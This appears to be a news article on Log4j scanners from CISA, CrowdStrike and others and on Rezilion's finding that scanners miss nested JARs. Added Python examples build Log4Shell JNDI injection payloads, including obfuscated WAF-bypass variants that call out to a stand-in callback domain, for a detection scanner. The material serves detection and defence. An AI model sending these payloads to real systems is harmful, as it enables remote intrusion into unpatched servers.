Multiple Log4j scanners released by CISA, CrowdStrike

Many Log4j scanners are available, but researchers say a number of them have blind spots.
Written by Jonathan Greig, Contributor

CISA released its own Log4j scanner this week alongside a host of other scanners published by cybersecurity companies and researchers.

The open-sourced Log4j scanner is derived from scanners created by other members of the open source community, and it is designed to help organizations identify potentially vulnerable web services affected by the Log4j vulnerabilities. 

CISA said it modified a Log4j scanner created by security company FullHunt and got help from other researchers such as Philipp Klaus and Moritz Bechler.

The repository provides a scanning solution for CVE-2021-44228 and CVE-2021-45046. CISA said it supports DNS callback for vulnerability discovery and validation, provides fuzzing for HTTP POST data parameters and for JSON data parameters, and accepts lists of URLs as input.

It also features WAF bypass payloads and fuzzing for more than 60 HTTP request headers.
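The mechanism described above (per-request DNS callbacks, header and parameter fuzzing, obfuscated payload variants) comes down to two pieces of logic: mint one unique token per injection point, and map any DNS query that later arrives at your callback zone back to the URL and location that carried that token. The following is an added example, not CISA's or FullHunt's code, and it does not send any traffic; it only builds the probe set and performs the correlation. The callback zone `oob.example`, the header subset and the token format are assumptions.

```python
import secrets
from dataclasses import dataclass
from typing import Dict, Iterable, List, Sequence, Tuple

CALLBACK_DOMAIN = "oob.example"   # assumed: a DNS zone you control and whose queries you log

# Assumed subset of the request headers a header-fuzzing scanner populates.
HEADERS = ["User-Agent", "X-Forwarded-For", "Referer", "X-Api-Version"]


@dataclass(frozen=True)
class Probe:
    url: str
    location: str   # "header:<name>", "post:<param>" or "json:<key>"
    token: str      # unique per probe; becomes the leftmost DNS label
    payload: str


def jndi_payloads(token: str, domain: str = CALLBACK_DOMAIN) -> List[str]:
    """One plain lookup plus two nested-lookup spellings of the 'jndi' keyword.
    Naive '${jndi:' signature matching misses the last two, but a vulnerable
    JndiLookup resolves all three to the same hostname, so the token survives."""
    host = f"{token}.{domain}"
    return [
        "${jndi:ldap://%s/a}" % host,
        "${${lower:j}ndi:ldap://%s/a}" % host,
        "${${::-j}${::-n}${::-d}${::-i}:ldap://%s/a}" % host,
    ]


def build_probes(urls: Sequence[str], headers: Sequence[str] = HEADERS,
                 post_params: Sequence[str] = (), json_keys: Sequence[str] = (),
                 variant: int = 0) -> Tuple[List[Probe], Dict[str, Probe]]:
    """One probe per (url, injection point). The returned index is what the
    callback listener needs to attribute a hit."""
    probes: List[Probe] = []
    index: Dict[str, Probe] = {}
    for url in urls:
        locations = [f"header:{h}" for h in headers]
        locations += [f"post:{p}" for p in post_params]
        locations += [f"json:{k}" for k in json_keys]
        for loc in locations:
            token = secrets.token_hex(6)
            probe = Probe(url, loc, token, jndi_payloads(token)[variant])
            probes.append(probe)
            index[token] = probe
    return probes, index


def correlate(dns_queries: Iterable[str], index: Dict[str, Probe],
              domain: str = CALLBACK_DOMAIN) -> List[Probe]:
    """Map query names seen at the callback zone back to the probes that caused them.
    Unknown tokens and queries for other zones are ignored; each probe is reported once."""
    suffix = "." + domain
    hits: List[Probe] = []
    seen = set()
    for q in dns_queries:
        name = q.strip().rstrip(".").lower()
        if not name.endswith(suffix):
            continue
        token = name[: -len(suffix)].split(".")[-1]   # label directly under the zone
        probe = index.get(token)
        if probe is not None and token not in seen:
            seen.add(token)
            hits.append(probe)
    return hits


if __name__ == "__main__":
    probes, index = build_probes(["https://app.example/login"],
                                 post_params=["username"], json_keys=["email"])
    # Constructed callback log: one genuine hit plus two lines of noise.
    victim = next(p for p in probes if p.location == "header:X-Api-Version")
    log = [f"{victim.token}.oob.example.", "unrelated.example.", "zzzz.oob.example"]
    for hit in correlate(log, index):
        print(f"VULNERABLE {hit.url} via {hit.location}")
```

A DNS hit proves only that the JNDI lookup string was evaluated somewhere in the target's logging path; it does not tell you which host evaluated it if the request was forwarded, so keep the probe index with the scan results rather than relying on the hostname alone.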

CrowdStrike similarly released its own free Log4j scanner called the CrowdStrike Archive Scan Tool, or "CAST."

Yotam Perkal, vulnerability research lead at Rezilion, tested some of the Log4j scanners and found that many were unable to detect every instance of the vulnerable library.

"The biggest challenge lies in detecting Log4Shell within packaged software in production environments: Java files (such as Log4j) can be nested a few layers deep into other files – which means that a shallow search for the file won't find it," Perkal said. "Furthermore, they may be packaged in many different formats which creates a real challenge in digging them inside other Java packages."

Rezilion tested the nine scanners most commonly used by developers and IT teams against a dataset of packaged Java files where Log4j was nested and packaged in various formats.

Perkal said that while some scanners did better than others, none were able to detect all formats. According to Perkal, the research illustrates "the limitations of static scanning in detecting Log4j instances."

"It also reminds us that detection abilities are only as good as your detection method. Scanners have blind spots," Perkal explained.

"Security leaders cannot blindly assume that various open source or even commercial-grade tools will be able to detect every edge case. And in the case of Log4j, there are a lot of edge instances in many places."
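The nesting problem Perkal describes is easy to reproduce. Below is an added example, not Rezilion's test harness and not any vendor's scanner: it builds a constructed EAR that wraps a WAR that wraps a `log4j-core.jar` in `WEB-INF/lib`, then runs a shallow scan (top-level archive only) and a recursive one against it. The class path used as the marker, `JndiLookup.class`, is the lookup class behind Log4Shell; using it as the detection key, the archive extensions recursed into, and the depth limit are this example's own choices.

```python
import io
import zipfile
from typing import Dict, List

# Detection key (example's own choice): the class whose lookup Log4Shell abuses.
MARKER_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Zip-based container formats to descend into (assumption; tar/gz and
# non-archive layouts are out of scope for this example).
ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")


def shallow_scan(data: bytes, name: str = "<root>") -> List[str]:
    """Inspects only the top-level archive, so anything nested is missed."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [f"{name}!{MARKER_CLASS}"] if MARKER_CLASS in zf.namelist() else []


def deep_scan(data: bytes, name: str = "<root>", max_depth: int = 8) -> List[str]:
    """Recurses into every nested archive (JAR in WAR in EAR, shaded JARs, ...).
    max_depth bounds recursion so a crafted archive cannot make the scan spin."""
    findings: List[str] = []
    if max_depth < 0:
        return findings
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings            # not a zip container: nothing to descend into
    with zf:
        for entry in zf.namelist():
            if entry == MARKER_CLASS:
                findings.append(f"{name}!{entry}")
            elif entry.lower().endswith(ARCHIVE_EXTS):
                findings.extend(deep_scan(zf.read(entry), f"{name}!{entry}", max_depth - 1))
    return findings


def make_zip(entries: Dict[str, bytes]) -> bytes:
    """Build an in-memory zip from a path -> bytes mapping (used to construct samples)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for path, content in entries.items():
            zf.writestr(path, content)
    return buf.getvalue()


def sample_ear() -> bytes:
    """Constructed sample: EAR -> app.war -> WEB-INF/lib/log4j-core.jar -> JndiLookup.class.
    The class body is a placeholder, not real bytecode."""
    log4j_core = make_zip({
        MARKER_CLASS: b"\xca\xfe\xba\xbe",
        "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n",
    })
    war = make_zip({"WEB-INF/lib/log4j-core.jar": log4j_core, "index.jsp": b"<html/>"})
    return make_zip({"app.war": war, "META-INF/application.xml": b"<application/>"})


if __name__ == "__main__":
    ear = sample_ear()
    print("shallow:", shallow_scan(ear))   # []: the marker is three layers down
    print("deep:   ", deep_scan(ear))      # one finding with the full nesting path
```

Even the recursive version only covers zip-based containers; it says nothing about log4j classes unpacked into a fat JAR under a different path, repackaged into tar.gz bundles, or loaded from a running JVM's classpath, which is the kind of edge case Perkal is pointing at.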
